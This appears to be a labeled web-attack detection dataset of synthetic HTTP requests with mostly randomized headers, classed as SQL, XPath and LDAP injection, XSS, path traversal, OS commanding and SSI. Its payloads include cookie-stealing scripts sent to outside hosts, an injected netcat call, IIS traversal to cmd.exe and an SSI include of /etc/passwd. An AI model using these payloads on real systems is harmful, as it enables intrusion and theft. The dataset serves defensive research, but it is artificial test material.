Pragma: aoiacrdn='denaJy7'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: feKvht kre0l0h=ebecnw
Range: 151606-
Referer: /deddl3qr.cfm
TE: trailers,chunked,chunked
Trailer: Accept-Language
User-Agent: m_9X_QxUy http://www.osneln8a.it
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9422x259
Via: qto/7.4 www.e46mdhud.jpg
Transfer-Encoding: compress
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45806
Start - Id: 48907
class: XPathInjection
GET /SVK-F6.rOusrDs/is8T/ezO@wjKRu/CqATcHetcOJ5m.7/nnMsHottlehesnqA/ivhihagntca1icNg8E/IwRe6rrraciNasanA/_u/tswv/nx4hlFf9baPIoTNtRm.asmx?Cba7ibs=oaw4l9th3sock_stream&uaryd876mdu=780&fuuOasnRyee7rn=441&rE9cK0esttas0=ceKa&alnmdho=jG8Q7hsYj&cmrlatssSat9deI=ee&itnEouAdAt=dHn.ymTw&1avi3phieea=Icso9taaiu2dqr&lls=ctd%27&Wd-M.KmHaix9=Ldnaeyf&adele2=298772888&eoeb5ciiqjgl=te5&2Iuea3dtrOeax=Esei6teagRge&zN6TwgetXji9Uwm=2455+or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++41427%3D&6avohagE29s=p7emhb HTTP/1.0
Host: 34.94.206.83
Connection: close
Accept: text/*, application/*, image/jpeg
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: eohir-0yso8o, ah-1E, eltc-teiia;q=0.3, iotns5jr-cvpeaa, o-sfs3siej
Cache-Control: no-cache
Client-ip: 115.108.162.213
Cookie: 002script4H3a=16843;Uz4faciratTaci=24628355;ltcheSdi=1182951559;1hs=orM;HqrlcTda0b=56
Cookie2: $Version="0"
Date: Sun, 15 May 05 15:29:01 GMT
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: bnte
From: nui8@hgERemx.net
If-Modified-Since: Wed, 13 Jul 05 13:44:40 UTC
If-Unmodified-Since: Wed, 07 Apr 04 05:57:53 CET
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: /rj1e/hlljmtp.gif
TE: trailers,gzip;q=0.7
Trailer: Warning
User-Agent: bma4/2.6.3
UA-CPU: MIPS
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3997x7266
Via: FTP/5.6 209.101.34.97:58625, 7.8 36.246.113.99, 1.9 www.wonipier.html
Transfer-Encoding: identity
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 58510218762
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48907
Start - Id: 45882
class: PathTransversal
GET /epF7YNGnjzoIA5Rnu.jpg?rB_rIFvDF=dnimrbsngKE&wsigEmS6t=Foh&WhttpMPYXGU=ayaiiframea3%2Flg%3Fdau1ke&temre5ntym=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fni%2Fngen%2Fsitogeme%2Fveliicrito.exe HTTP/1.1
Host: 29.192.219.133
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-8-i, windows-1252;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: d0sOw-ocesot
Cache-Control: no-transform
Client-ip: 58.223.222.209
Cookie: 1uBUYc7GNpasswd=45;XN7XW9VLgd=suN
Cookie2: $Version="086"
Date: Thu, 12 Feb 04 01:27:56 GMT
ETag: "qcIN6.ToaSAjnoWr"
Expect: eaheae
From: erymey@jq6fn.org
If-Modified-Since: Wed, 30 Jan 08 10:42:31 GMT
If-Unmodified-Since: Sun, 18 Feb 07 09:01:23 GMT
If-Match: "6ZoJKPLkFBZhBOd"
If-None-Match: "BTyz_6tsDEPm5Zt"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: Digest opaque="exAamlh"
Range: 81947-,357703-
Referer: http://www.hees3e.com/syxcsh0H/dtf5sdj/oEeaer/nh2cnal.zip
TE: deflate;q=0.0,deflate;q=0.1
Trailer: TE
User-Agent: nxc6sO4v http://www.n3jdd.it
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: pqirj
Upgrade: hefsr/6.5, dHr/8.0, ntceiI/7.2, aesn/7.0
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45882
Start - Id: 47566
class: XSS
GET /9WbBAC.G/taeyfersfiyzerAt.jpg?PC8wVU4M=3514226&otdaeesel3llas=timficSpbTi%3Dos&eWtstcs5=84&36meEskelynrlYa=scaan%2Faw&jZla2iebc=4tt46lnu7sprjizhv&a5huhfun=H8gnacf&arer0aee=542476&cAmGeoysec=e+gSa&oTwhgmssokujeCv=264488&eIt=%3Cimg+++src++++%3D+%22+leerroas%3E+%22+++onmouseover++++%3D%22+%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.anelro.com%2Fcgi-bin%2Fch.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E&il7=7313535&narpiEw=HOkDgElgiAwuqhtI HTTP/1.1
Host: www.fckstNT.biz
Connection: close
Accept: text/plain, image/jpeg
Accept-Charset: x-mac-icelandic, windows-1257, koi8-r;q=0.3, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 179.102.117.111
Cookie: amaoo=9nateiformnuap;se=77832;VdamdtTcosya=re64lizEouuQesEiat;nyeq3bpogi0yr7=57797554
Cookie2: $Version="4"
Date: Sun, 18 Feb 07 03:13:06 CET
ETag: W/"U8aHqItHXJkmtXoCz4YF"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Sun, 02 Nov 08 16:41:41 CET
If-Unmodified-Since: Wed, 09 Mar 05 20:12:53 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 23 May 07 03:52:07 CET
Max-Forwards: 282
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: et1vtr gmhadkba=incdte
Range: 946-214738,54330-8
Referer: http://seso7ei.com/uhEyuon/dNatemy/srua.asp
TE: gzip,gzip;q=0.7
Trailer: Accept-Language
User-Agent: Eagfth9 (nYiVC9h; r2mM1yK; 9dumnyTnzl; 9-IO-c)
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 684x889
Via: 4.4 223.46.208.168:26876, 6.9 175.192.77.109, HTTP/5.1 117.93.85.241
Transfer-Encoding: compress
Upgrade: eTere/4.3, ulLei/2.8
Warning: 080 16.181.246.224 "nOai1ghriikwtss" "Mon, 29 Aug 05 07:48:25 UTC"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47566
Start - Id: 41610
class: SqlInjection
GET /hhcihaest/oSQKIB/rswHueeurTzssrns0b/hqxF/uxcx1LMMBtzk.N-/mJ14CEUOqR/oOQXVRHi5IU/4S@LyETJiw8DHAPl@/oxNPpeTRh_J/usu4aeeaslibLh/mei9l9eT7/tetor.shtml?aee5g=4090&t0cy=go&sdeletePxmlkDO=80251710&tgn59=34989483&4libl7Qw=AND++ascii%28lower%28substring%28%28SELECT++++TOP++++1++++q4lnsnw++++FROM++sysobject+WHERE++xtype++%3D+++%27U%27++++%29%2C1%2C1%29%29%29++%3E++111&8rTqRn6sqsiAeu=904&lOGRz=f-6 HTTP/1.1
Host: www.rnottdadc2.it
Connection: keep-alive
Accept: video/mpeg;q=0.5, application/zip;q=0.0, video/*;q=0.1
Accept-Charset: x-mac-icelandic, x-mac-ce
Accept-Encoding: *;q=0.1
Accept-Language: 2tbS-7hmsS2
Cache-Control: no-store
Client-ip: 201.1.229.162
Cookie: esui0lko9ta=nhtitimco/e2i;l@cUtelnet=aaNjSJDKNrs;YQZI=f]usr;srgwaar=imenetterstrt8ua;ifn=s3teisiaaaAaOa9e;iiuiuvtv2urr=1790
Cookie2: $Version="003"
Date: Sun, 13 Apr 08 09:02:05 CET
ETag: "KsP3Ere2ZHDYov_"
Expect: 21isusex=tfanht;a6dua
From: tcssd@oays6you.com
If-Modified-Since: Sun, 20 Mar 05 12:09:33 GMT
If-Unmodified-Since: Fri, 06 Feb 04 08:51:24 UTC
If-Match: *
If-None-Match: "ltbFMmLXKRjWwTkOA.dW"
If-Range: Sun, 19 Sep 04 01:58:26 UTC
Max-Forwards: 0
MIME-Version: 3.1
Pragma: nqsm=n2wk
Proxy-Authorization: Digest qop=habec
Authorization: Digest algorithm=MD5-sess
Range: -27,878-
Referer: /eeeeie.php4
TE: trailers,trailers
Trailer: Host
User-Agent: neEietng (tYR7yVb-Ot; cDp3k@; e-m4xS; vIccPKMBRr)
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: HTTP/1.1 www.p4oseg.html, 9.5 166.249.120.111
Transfer-Encoding: gzip
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 589 www.3dab.jpg "husrsrrj" "Mon, 17 Jul 06 16:04:46 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41610
Start - Id: 45073
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: 238.192.233.164:49
Connection: keep-alive
Accept: image/png;q=0.6
Accept-Charset: iso-2022-kr;q=0.6, x-mac-arabic, x-mac-arabic, gb2312, iso-8859-2;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: uv-7hln, mouirhnr-epTo, I9eszhd-rahyawgs;q=0.5, I5uamtsh-jS, tETnNte0-o0Tokhn;q=0.7
Cache-Control: only-if-cached
Client-ip: 101.182.197.221
Cookie: Tz6WyA=rt3oaasosg9;eeet5=y)xfieinput]Ot ;kTus8uc=u'%ul\4scriptetmpm echoe;pyijGigo0at=7154644;agYV53x6qkFu=g8khsiah4oNrua0tdh
Cookie2: $Version="785"
Date: Mon, 28 Aug 06 12:06:43 GMT
ETag: "_uREHyn1qc_Dj7YZg"
Expect: 100-continue
From: 8gV2@oyweendsp.ch
If-Modified-Since: Thu, 19 Apr 07 08:27:05 CET
If-Unmodified-Since: Tue, 14 Apr 09 19:07:45 UTC
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: Thu, 12 Feb 09 04:56:57 CET
Max-Forwards: 4
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM Z2U4WG9ld2lyZ2JydWNlcGlhb2hURW5MM2xuN3JzZXV0ZGFyYWFyZg==
Range: 51016-,-10087
Referer: http://www.dteeb64.net/nnnlc.gif
TE: trailers
Trailer: Range
User-Agent: sienE (ezzTMO50; iPXQ1NP9dc; iS8931; h_IYit8K; rT28nF)
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: HTTP/6.3 www.taEto1o.css, 8.7 151.61.158.167
Transfer-Encoding: compress
Upgrade: ttl/4.7, aedaR/4.8, n3bej/5.3
Warning: 634 220.181.199.153 "EI6etnt" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45073
Start - Id: 47537
class: XSS
GET /cNFaHfV73FcQL6PsGH/fMw4/i19wNoUG9sM6bGMg/nGgFTeWFkdN8Qhp9ld/aviYvY.od@QyT/yM/osdtt3wemcetwk/G6qU1U3L3iframe.jpeg?tra=917t6poleu&V3wgetJexec=033988&aknte55eyea=r-PIBMEru18y&ceartesi=rEn+A&ducenba=%3Cimg+++++src%3D+++%22+++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F238.251.151.179%2Fmellto.bin%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&7nstMiinbnnat=ils1nua7i1gaSdLri&adi5touatieoi8=eVu HTTP/1.1
Host: www.rittm.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.8, compress;q=0.3, gzip;q=0.0, compress;q=0.1, compress;q=0.4
Accept-Language: *;q=0.1
Cache-Control: min-fresh=38025
Client-ip: 37.55.220.136
Cookie: dmreo=eLecu;52blc9lb8nessid=i%rv
Cookie2: $Version="61"
Date: Fri, 21 Dec 07 03:22:37 UTC
ETag: "G60koYB8vEN@YsEWc3"
Expect: pnInt
From: sevLsg9@hooNmu.fr
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Wed, 25 Feb 04 14:53:05 UTC
If-Match: *
If-None-Match: *
If-Range: "zbD6bwp@EhO9Zn0"
Max-Forwards: 2
MIME-Version: 0.8
Pragma: 9e=gitie
Proxy-Authorization: NTLM dGx0ZGViczZjR2lwUjhibmlPc3RybGV4dEZldGFycmpvVGhuag==
Authorization: Irtno s0ohameh=vleani
Range: 8094-,77-91254,-8945
Referer: http://0ot5E.uk/no0aned/cuge/rriMa/acrceish/ueeq.jpg
TE: gzip,deflate
Trailer: TE
User-Agent: hcMIn. http://www.neyt.net
UA-CPU: 68000
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.5 39.34.171.134, 0.0 www.hfnpceem.gif
Transfer-Encoding: a7ut; derLnT=bsferx
Upgrade: ehzL/0.2, mtlah/0.2, jsco/5.4, toi/4.5
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47537
Start - Id: 47185
class: XSS
GET /isdl1fqIoDnOsomosgs/fH1B/c.6FiPmLHpj9xP.pl?xh3=492985&eymnmeiz=aao&Mo=7&7baeFl=t6v&mmatnnwoshhd=rge5sdorrTsr&etH=hs&ssosea9=ebn5&zH4T=geS4e+%22+++++++++style%3Dleft%3Aexpression%28alert+%28%22+++eeic.Hd%22%29%29++alt+++%3D+%22&eyIs=tYA&xeyighdcw=31575062&liiej6s=oUfrS&de=8906247924&ce2sLdcAn926b=nssteKboIeijh&33aomncaOmee=eezUgdaeys%2Beua HTTP/1.0
Host: www.ilrsm4.ch:80
Connection: close
Accept: video/quicktime, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 65.151.77.8
Cookie: utIg6xRXgvH=bbE;IsL50aoodhioe2c=aq
Cookie2: $Version="93"
Date: Tue, 23 Feb 10 19:18:50 UTC
ETag: W/"sx302XohAygbTfJiaE"
Expect: 100-continue
From: oeDi@asaha.net
If-Modified-Since: Mon, 22 Nov 04 10:30:00 GMT
If-Unmodified-Since: Fri, 16 Feb 07 05:17:21 UTC
If-Match: "KpN0d.NNBWyf3Np.O"
If-None-Match: *
If-Range: Sat, 02 Dec 06 01:40:03 UTC
Max-Forwards: 11
MIME-Version: 1.6
Pragma: uva='di'
Proxy-Authorization: NTLM T2VlYWplZW9rdGVpdHRncmVTZnM1ZWVubWZqaWpuYWJw
Authorization: Basic b0FuTTJubjpoaGZlbWdT
Range: 671-463
Referer: http://sdi4tu.gov/5tpNdehx/eDta/eiQbw.mdb
TE: gzip;q=0.9,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.4 (Windows; U; Windows NT 0.3; dr-de; rv:0.6.1) Gecko/07443151
UA-CPU: Sparc
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 739x565
Via: HTTP/1.5 www.ersai0tP.htm
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47185
Start - Id: 43426
class: OsCommanding
GET /DsflwhnttabOros/_b.sF./fe5bentkLryvexwegyV.jpg?gcz2mrNhes=l4oqr1wao6bjon&1duah2=c%29eeu&r6gnnentttle=2&il=%250a+nc+++++www.rans.com+80+++%3B&ocotytiuosGw=i-ot+reny9h%27h&2jir69g=lbhRkbi HTTP/1.0
Host: 86.79.89.251
Connection: keep-alive
Accept: application/*
Accept-Charset: cp-932;q=0.4, cp-932, koi8-r;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 44.129.23.74
Cookie: emnsmi=titIaseaos;ehsmr=jccicdo2gh6eswlw;Sn=1ef9feoPm;sogahiaphr=sst h;qcinsertie6b=771
Cookie2: $Version="368"
Date: Thu, 12 May 05 13:32:55 GMT
ETag: "SXlKX0iIfToerMa9aXcU"
Expect: oteD40
From: satt@ee2io.st
If-Modified-Since: Sun, 25 Dec 05 24:17:46 UTC
If-Unmodified-Since: Tue, 24 Feb 04 08:41:28 UTC
If-Match: *
If-None-Match: "J79v7LUWGKKvcRkLIe7m"
If-Range: Sun, 22 Feb 04 14:42:32 GMT
Max-Forwards: 506
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: Digest nonce
Range: 5130-,89497-47998,93-50140
Referer: /e6rt/lgaehaf/ksk5nain/teioit5.asmx
TE: deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/4.6 (X11; U; SunOS sun4u 5.7; ue-e7; rv:3.3.4) Gecko/31357365
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: 0.8 123.62.179.87, 0.1 www.n16n.shtml
Transfer-Encoding: gzip
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43426
Start - Id: 49494
class: XPathInjection
GET /bremyq1ceeic/abireecqoea/OaceitaeaeTi/lmzoi.php3?pPH.x=62527253&MsGrdkV3jasyoyp=ai1ntnErw4tLleot&cy8i=%28i+++++%3C++++count%28yhpbf%2Fchild%3A%3Atext%28%29%29+and+++++j+%3C+++++count%28iTT9%2Fchild%3A%3Acomment%28%29%29+++and+++++k++%3C++++count%28eenase%2Fchild%3A%3A*%29++%29&orhesin9gsts7ea=iVbUNeIk&yhpN6nrexn=6&tnni08=usrnEZeyi&hQt3eteo2=325869&shhlrgtine=aRWQcmj-DicH&et4Gx1wnfm=selectolxnte2Flcaraccept&hbOryaSW5Es=rLe%3Ahj&brrta4ssre7t=8646262&edsVRhTbi=42 HTTP/1.0
Host: 153.62.212.181
Connection: close
Accept: video/*;q=0.9, video/quicktime;q=0.9, text/*
Accept-Charset: *;q=0.0
Accept-Encoding: compress, deflate
Accept-Language: *
Cache-Control: Li='goev'
Client-ip: 223.242.155.63
Cookie: hANTYB=aos3tDloe;yNos3ahnt6v8eli=035_B3QVO5Z0;cmdmLfaVlibgwherereplace=2200561231;@qdCOunc@2Dw=yz
Cookie2: $Version="238"
Date: Tue, 06 Jan 04 13:44:01 UTC
ETag: "JDg6S18LaQ9Ja_0YULOc"
Expect: zimlrze=7x4eo
From: heDlu@i6la6.fr
If-Modified-Since: Tue, 10 Jan 06 06:29:53 UTC
If-Unmodified-Since: Tue, 05 Sep 06 17:04:25 CET
If-Match: *
If-None-Match: "iMfXCeqwU5.17ekm"
If-Range: Tue, 06 Mar 07 19:01:58 CET
Max-Forwards: 3
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: 79Ynan eOtsi=mrfenfti
Authorization: urdmey er4o=atlis
Range: -012
Referer: http://www.eimsh.net/0xse/dmidTf/2ntovlv/nebhnoi2/bis4d.mp3
TE: deflate
Trailer: Authorization
User-Agent: eAatwe0e/9.9.1
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 769 www.giteyoe.png "lena5ieoo" 
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49494
Start - Id: 44520
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Skprmmcji.cz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: pdaein-2ausodpl, i-xwglg;q=0.5, 8h5-t8;q=0.0, roeoyak-meely4F
Cache-Control: no-cache
Client-ip: 108.61.204.42
Cookie: Eadjaliet=e_uqTYYep;errndc9e=nVCKPxQ6OM;geH-RvR9=3567216;tfksitDnieRe=oJZ4kH05-h3
Cookie2: $Version="817"
Date: Fri, 12 Oct 07 10:50:56 UTC
ETag: "6.58tUusJo7_pzi8ZM"
Expect: 100-continue
From: bsntalu@ofn3s.de
If-Modified-Since: Sat, 16 Apr 05 13:06:37 UTC
If-Unmodified-Since: Tue, 22 Feb 05 09:31:00 GMT
If-Match: "OYpkBKwDqtc@BqL"
If-None-Match: *
If-Range: *
Max-Forwards: 89
MIME-Version: 8.3
Pragma: iitshoiw='uae'
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: ienbeh ieerread=snqackgo
Range: 0-753213
Referer: /rhbda/Sgia4b/ToerzXc/ko2bo.mdb
TE: trailers
Trailer: Warning
User-Agent: s9MsfY-M http://www.qteE9.fr
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x841
Via: HTTP/3.4 184.233.61.225, HTTP/2.8 195.249.94.183, 6.1 158.244.173.94
Transfer-Encoding: deflate
Upgrade: c3oe/1.8, sib/4.3, apenZ/1.3
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44520
Start - Id: 44749
class: PathTransversal
GET /ftmdoyyxaiELTledmc/lWsItZtjS/enaltetjaWraTre/nCkHXG0s@w4ZRkcS0Ud/2tsr2olc1asncole/hd1tusRets3eirtk/Ion/eihaereshhshraPi/IS_null.h-FkmetaGRJ/mB2SzY/qemsed.shtml?yThhcekoo9bmYac=.%2F..%2F.%2F..%2F&sivta3oeqRalj=gdcxtXati6jn&1bIshzxYd=etreplacemlupdate%5D4Ebr%3Denet9e%27e&9OoL=hcjqRt&ley=6taiperl+et1ereh&aLaxQeMnetvrRte=f+processing-instruction7eexectelarob&lOCJPlnetcat=469975&abNerqnxoeTnams=dp8&grhce=37217 HTTP/1.0
Host: www.yuhtlive.ch
Connection: keep-alive
Accept: application/zip;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: d5ei='q0r1'
Client-ip: 45.186.49.209
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="80"
Date: Fri, 12 Oct 07 24:49:38 GMT
ETag: "NxGNKHZyoiZDQDfNgr"
Expect: seeEneF
From: rairnenr@fiohetan.org
If-Modified-Since: Sun, 29 May 05 14:18:10 CET
If-Unmodified-Since: Mon, 02 Jan 06 17:12:06 GMT
If-Match: *
If-None-Match: *
If-Range: "isGqpE53p-LmxJdZ-hE_"
Max-Forwards: 3
MIME-Version: 7.9
Pragma: e00c='d'
Authorization: Digest nonce
Range: 027680-5,4627-
Referer: /aryse.css
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: UIeiuEie/1.6.3.3
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: a7t2da
Upgrade: Qya/6.2
Warning: 079 www.n1cn.tiff "meawmehgeEqekttk" "Tue, 06 Jul 04 17:24:32 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44749
Start - Id: 39571
class: SSI
POST /396wG0TAplyTP/adotiifrrmcisd/eLr-4l0teEx8YU/gahuhl36ur7td/o9Cvf/dnjiframei.-RtTcopyP/ut0R/0soOdp1en_@BSO/Y111Ms/addafls4tgeeuar.dll? HTTP/1.1
Content-Length: 97
Content-Language: a
Content-Encoding: identity
Content-Location: /ttPCne/i9tm.wav
Content-MD5: ZmdubmVncjlodHdvZWlpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 13:41:11 CET
Last-Modified: Tue, 11 Oct 05 21:24:02 GMT
Host: 237.225.164.219:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-greek, shift_jis;q=0.7, x-mac-roman;q=0.3, iso-8859-1;q=0.5
Accept-Encoding: deflate, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 222.71.177.248
Cookie: s94laigau0LerNn=aaea;@v5objectMOtqF=ukvoLW;ilelsoo7ea7d=lF076zVq-xuv;f-2Lz=fui8tdnutsbgsound;swrhaZaHOeiaotq=682
Cookie2: $Version="24"
Date: Thu, 11 Feb 10 24:25:13 CET
ETag: "0znt_obhBQJK@EiG6Fk"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Tue, 22 Jan 08 01:33:24 UTC
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: *
If-None-Match: "euxEby7u13viOEm-J"
If-Range: Wed, 10 Nov 04 03:18:01 GMT
Max-Forwards: 640
MIME-Version: 8.5
Pragma: thl4hHrr='i'
Proxy-Authorization: Basic ZXRpYWFVOnNhc2NwbnA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 54-,-069294,81-
Referer: /nv7eh5a/menyisi/neqe/ei1e.swf
TE: trailers,chunked;q=0.2,deflate
Trailer: Pragma
User-Agent: Mozilla/9.6 (X11; U; Unix 8.1; so-tm; rv:8.7.9) Gecko/08202947
UA-Disp: 9131,8742,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 645x141
Via: 9.8 www.hreh.js, 6.1 www.ia3nil.tiff
Transfer-Encoding: gzip
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 160 24.22.169.229 "rronaouo9om9e1h5" "Mon, 07 Feb 05 22:47:07 GMT"
X-Forwarded-For: 36.239.161.183
X-Serial-Number: 7950474453739700165
----: ------------------------------
~~~~~: ~~~~~~~~~~

oz=group bynhgi(sj(dem&cvoe=<!--  #include     virtual="/etc/passwd"    -->

End - Id: 39571
Start - Id: 38521
class: LdapInjection
GET /lmIteb/sY-qgHa0_o/LXnvFAYPc0@7S2/oncundatXml7soeSSe/ev@ghR7H/rea/b0xefmkO7/oIAM63/4lhomjtm2uslgyra/tVY@6PNCDg/uy2hGqj9l.jpg?jhhfps1ls=%29+%28+%7C+%28tab%3Dtn*%29&utd3=laaenbst8&1wCESlhaving=si8iCinsert HTTP/1.0
Host: 213.14.211.177
Connection: AtthOoo
Accept: text/xml, text/plain;q=0.6, application/x-tar
Accept-Charset: *
